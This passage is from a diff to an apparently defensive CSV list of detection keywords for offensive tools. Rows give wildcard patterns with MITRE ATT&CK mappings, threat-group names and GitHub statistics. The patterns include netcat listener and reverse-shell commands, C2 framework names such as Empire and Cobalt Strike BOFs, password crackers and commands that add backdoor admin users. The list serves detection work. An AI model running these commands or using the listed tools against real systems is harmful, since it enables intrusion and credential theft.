hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NBNSBruteForcePause*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NBNSBruteForceSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NBNSBruteForceTarget*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*nbnsspoof.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*NBNSSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*nc 127.0.0.1 4000*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "*nc -nlvp 4444*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" -"*nc -vlp 4444*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*nc -vlp 4445*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*nc.exe 127.0.0.1 4444*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*nc.exe -l -p 1337*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*nccgroup/demiguise*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*nc -vlp 4444*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*nc -vlp 4445*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*nc.exe 127.0.0.1 4444*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*nc.exe -l -p 1337*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*nccgroup/demiguise*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "*ncrack-*.dmg*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" "*ncrack-*-setup.exe*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" "*ncrack.exe*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" "*NcrackInstaller.exe*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" "*ncrack-master.zip*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" "*ncrack-services*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" -"*ndDelegation.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*ndp_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*Ne0nd0g/merlin*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*ndDelegation.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ndp_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*Ne0nd0g/merlin*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" "*needle_sift.x64*","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" -"*Needles without the Thread.pptx*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*Needles without the Thread.pptx*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*needlesift.cna*","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" -"*neo2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*neo2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*neo4jconnection.py*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*neoneggplant*","offensive_tool_keyword","Github Username","author of RAT tools on github","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nessus* --set listen_address=127.0.0.1*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" @@ -13957,7 +14117,7 @@ "*Nessus-*.rpm*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.tar.gz*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.txz*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" -"*nessus_vulns_cleaner.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*nessus_vulns_cleaner.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*nessuscli fetch*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*nessuscli fix*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*nessus-updates*.tar.gz*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" @@ -13968,39 +14128,40 @@ "*net localgroup administrators icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*net start SysUpdate*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*net user /add icebreaker *","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*net user HackMe *","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows 